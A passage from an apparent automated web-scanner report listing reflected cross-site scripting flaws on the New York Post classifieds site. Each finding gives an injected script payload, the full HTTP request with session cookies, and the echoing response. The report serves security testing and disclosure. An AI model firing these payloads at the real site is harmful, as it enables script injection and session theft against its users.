1.167. http://www.classifieds.nypost.com/housing/rent/apartment/-/-/usa:ny:newyork/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/-/-/usa:ny:newyork/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bad1"><script>alert(1)</script>63ee40d0fad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing/rent7bad1"><script>alert(1)</script>63ee40d0fad/apartment/-/-/usa:ny:newyork/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing/rent7bad1"><script>alert(1)</script>63ee40d0fad/apartment/-/-/usa:ny:newyork/" />
...[SNIP]...

1.168. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/sale/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1b60"-alert(1)-"e28bfea4659 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housingd1b60"-alert(1)-"e28bfea4659/sale/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:46 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4Njt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housingd1b60"-alert(1)-"e28bfea4659/sale/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.169. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/sale/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54945"><script>alert(1)</script>9f14a9819b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing54945"><script>alert(1)</script>9f14a9819b6/sale/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:46 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4Njt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing54945"><script>alert(1)</script>9f14a9819b6/sale/" />
...[SNIP]...

1.170. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/sale/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6665e"><script>alert(1)</script>8d16d82beca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing/sale6665e"><script>alert(1)</script>8d16d82beca/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4Nzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing/sale6665e"><script>alert(1)</script>8d16d82beca/" />
...[SNIP]...

1.171. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/sale/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a03c7"-alert(1)-"846ae1a119a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing/salea03c7"-alert(1)-"846ae1a119a/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:48 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing/salea03c7"-alert(1)-"846ae1a119a/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.172. http://www.classifieds.nypost.com/info/privacy/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/privacy/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac3ed"><script>alert(1)</script>7d4d5e2ea5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /infoac3ed"><script>alert(1)</script>7d4d5e2ea5e/privacy/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:25:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/infoac3ed"><script>alert(1)</script>7d4d5e2ea5e/privacy/" />
...[SNIP]...

1.173. http://www.classifieds.nypost.com/info/privacy/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/privacy/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd10f"-alert(1)-"09a106370b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /infofd10f"-alert(1)-"09a106370b4/privacy/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:25:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds infofd10f"-alert(1)-"09a106370b4/privacy/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.174. http://www.classifieds.nypost.com/info/privacy/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/privacy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4d69"><script>alert(1)</script>f53af88dd7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info/privacy/?a4d69"><script>alert(1)</script>f53af88dd7b=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:59 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5OTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/info/privacy/?a4d69"><script>alert(1)</script>f53af88dd7b=1" />
...[SNIP]...

1.175. http://www.classifieds.nypost.com/info/privacy/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/privacy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bb31"-alert(1)-"eaa692a63db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /info/privacy/?1bb31"-alert(1)-"eaa692a63db=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:25:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_-nypost-_-info-_--_--_--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-info-_-info-_--_-nypost-_-USA-_-nypost-_-info-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreatePageviewTag("info privacy/?1bb31"-alert(1)-"eaa692a63db=1","10000017","","","ny-_-info-_-info-_-nypost USA-_-nypost-_-USA-_-nypost-_-info-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.176. http://www.classifieds.nypost.com/info/safety/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/safety/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b48"><script>alert(1)</script>09070aae295 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info88b48"><script>alert(1)</script>09070aae295/safety/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
